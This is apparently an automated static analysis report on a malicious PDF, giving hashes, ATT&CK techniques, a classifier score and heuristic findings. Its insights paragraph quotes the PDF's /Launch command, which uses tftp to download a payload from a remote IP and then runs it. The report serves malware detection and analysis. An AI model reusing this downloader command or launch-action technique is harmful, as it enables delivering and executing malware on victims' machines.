Malicious PDF — malware analysis report

Static analysis result for SHA-256 b2d7811a4c64b413…

MALICIOUS

PDF

1.3 KB
MD5: f24f61a75eb6ac31709428c2c3c39d87 SHA-1: bb11efdbbc5e45a4842d7a6e7f35db7aba3d083e SHA-256: b2d7811a4c64b4133c2a2a4e9bfc92e5acab77fef4cff3c4a8c8f399571bf792
150 Risk Score

Malware Insights

MITRE ATT&CK
T1204.002 Malicious File T1059.003 Windows Command Shell T1105 Ingress Tool Transfer

The PDF contains a launch action that executes 'cmd.exe'. The command line argument provided is 'tftp -i 172.16.122.138 GET /tmp/titan/calc.exe&&calc.exe', which attempts to download a file named 'calc.exe' from the IP address 172.16.122.138 via TFTP and then execute it. This indicates a downloader pattern aiming to retrieve and run a second-stage payload.

Machine Learning

  • Nyx PDF Classifier malicious score 0.9996

Heuristics 2

  • Launch action critical PDF_LAUNCH
    PDF contains a /Launch action whose target is an executable, URL, or UNC path — can start an external application
  • /Launch action target: cmd.exe critical PDF_LAUNCH_COMMAND
    PDF /Launch action specifies an executable target — references a known-dangerous executable (cmd, PowerShell, etc.).

Open this report in the interactive analyzer, or submit your own file for analysis.